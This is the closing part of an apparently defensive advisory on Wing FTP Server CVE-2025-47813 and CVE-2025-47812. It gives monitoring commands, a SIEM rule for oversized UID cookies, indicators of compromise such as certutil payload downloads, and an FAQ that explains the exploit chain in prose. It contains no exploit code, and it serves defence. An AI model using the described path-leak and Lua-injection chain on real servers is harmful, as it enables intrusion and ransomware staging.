Deploy real-time file integrity monitoring on the session directory. On Linux, use auditctl -w /opt/wingftp/sessions/ -p wa -k wingftp_sessions. On Windows, enable Object Access auditing on the session folder and consume Event ID 4663 in your SIEM. Alert on any .lua file creation or any session file exceeding 500 bytes.
Build a structured SIEM log pipeline for Wing FTP HTTP logs. Write a custom parser that extracts the UID cookie value length from Wing FTP HTTP access logs as a numeric field. Alert when that field exceeds 300 on a request to /loginok.html — this detects CVE-2025-47813 exploitation before the path is disclosed.
Micro-segment the Wing FTP host at the network layer. Place the host in a dedicated VLAN with deny-by-default east-west rules. Allow only inbound FTP/SFTP/HTTPS from authorized client ranges, inbound admin access from a specific jump host, outbound to defined storage targets, and outbound to your SIEM. No general internet access from the host.
Hunt for post-exploitation indicators on previously exposed systems. On any Wing FTP Server instance running 7.4.3 or earlier that was internet-accessible between July 2025 and the date of patching, enumerate all .lua session files, sort by size, and inspect any above 500 bytes. Look for anomalous outbound connections from WFTPServer.exe, certutil invocations, and unauthorized user accounts.
Verify remediation and confirm patch status. After upgrading, confirm the installed version is 7.4.4 or later. Cross-reference the NVD entry for CVE-2025-47813 at nvd.nist.gov and check the CISA KEV catalog to confirm compliance. Federal agencies must complete remediation by March 30, 2026 under BOD 22-01.

Frequently Asked Questions

What is CVE-2025-47813 and why is it on the CISA KEV catalog?

CVE-2025-47813 is an information disclosure vulnerability in Wing FTP Server's web interface. When an authenticated user sends a request with a UID cookie value longer than the operating system's maximum path length, the server generates a verbose error message that reveals the full local installation path. Despite a medium CVSS score of 4.3, CISA added it to the Known Exploited Vulnerabilities catalog on March 16, 2026, because it is being actively used in attacks as a reconnaissance step that makes the companion critical RCE vulnerability CVE-2025-47812 significantly easier to exploit.

Which Wing FTP Server versions are affected?

All Wing FTP Server versions at or below 7.4.3 are affected by CVE-2025-47813. The vulnerability was patched in version 7.4.4, released May 14, 2025. Version 7.4.5 and all subsequent releases also contain the fix.

How does CVE-2025-47813 enable the CVE-2025-47812 RCE exploit chain?

CVE-2025-47813 leaks the Wing FTP Server installation path. CVE-2025-47812 is a null byte and Lua code injection flaw that allows an attacker to write a malicious session file to disk and then execute it to achieve remote code execution. Knowing the precise installation path removes the guesswork from locating and targeting those session files — a step that is especially significant on Windows systems where installation paths vary between environments.

What is the remediation deadline for federal agencies?

Federal Civilian Executive Branch agencies are required to remediate CVE-2025-47813 by March 30, 2026 under Binding Operational Directive 22-01. Private sector organizations are not bound by the directive but are strongly encouraged to treat the same date as an urgent remediation target given active exploitation is confirmed.

What are the indicators of compromise for CVE-2025-47812 exploitation?

Key indicators include unexpected .lua files in the Wing FTP Server session directory, anomalous outbound network connections from the WFTPServer.exe process, evidence of certutil being invoked from the Wing FTP server process (commonly used to download and execute external payloads), and new user accounts on the host that cannot be accounted for in normal operations.

Why do medium severity vulnerabilities appear on the CISA KEV catalog?

The CISA KEV catalog tracks confirmed active exploitation, not theoretical severity. A vulnerability with a low or medium CVSS score can still appear on KEV if evidence shows it is being used in real attacks — particularly when it enables exploitation of a higher-severity companion vulnerability. CVE-2025-47813's CVSS score of 4.3 did not prevent its KEV listing because CISA's criterion is observed exploitation impact, not calculated score.

Why did CISA take eight months to list CVE-2025-47813 when CVE-2025-47812 was listed in July 2025?

KEV listing requires confirmed in-the-wild exploitation as a documented, observed event — not theoretical exploitability or PoC availability. In July 2025, the exploitation evidence for CVE-2025-47812 was immediate and well-documented. CVE-2025-47813 was almost certainly being used in the same attack chains, but independent documentation of the path disclosure step as an actively exploited component took longer to accumulate. CISA's March 2026 listing reflects when the evidentiary threshold was reached, not when exploitation began. Defenders should treat July 2025 as the start of the active exploitation window for both CVEs.

Can CVE-2025-47813 exploitation be detected before the attack chain completes?

Yes. The exploit requires a request to /loginok.html with a UID cookie value longer than the OS path length limit — typically 260 characters on Windows, 4,096 on Linux. A SIEM rule or WAF alert triggering on UID cookie values exceeding 300 characters on that endpoint will catch the attempt before the path is disclosed. Legitimate Wing FTP session cookies do not approach that length. Verbose HTTP logging on the Wing FTP host will also capture the error response that fires when the exploit lands. Either log source gives defenders a detection opportunity before the chain progresses to CVE-2025-47812.

Who is exploiting these vulnerabilities and what are they after?

Available incident data points to opportunistic, financially motivated attackers — including initial access brokers and ransomware affiliates. Huntress's July 2025 incident analysis described behavior consistent with automated tooling and certutil-based payload delivery, techniques common in crimeware operations. File transfer servers are a known ransomware staging ground following the 2023 Cl0p campaigns against MOVEit and GoAnywhere MFT. A compromised Wing FTP host gives an attacker SYSTEM-level access and internal network connectivity — a foothold valuable to ransomware operators, extortion groups, and anyone selling initial access. The investigation scope should not be limited to the Wing FTP host if compromise is confirmed.

What is CVE-2025-27889 and does it affect my remediation priorities?

CVE-2025-27889 is a link injection vulnerability at Wing FTP Server's /downloadpass.html endpoint, not an XSS flaw. The url parameter is not properly sanitized, allowing an attacker to inject an arbitrary destination link. If a user clicks the crafted link and submits the login form, their cleartext password is disclosed to the attacker. It carries a CVSS score of 3.4 and requires user interaction — it is not remotely exploitable without victim participation. Critically, CVE-2025-27889 was patched in version 7.4.3 (released March 30, 2025), not 7.4.4. Organizations running 7.4.3 are already protected against CVE-2025-27889 but remain fully exposed to CVE-2025-47812 and CVE-2025-47813 until they upgrade to 7.4.4. The correct minimum version for full coverage of all actively exploited flaws is 7.4.4.

← all articles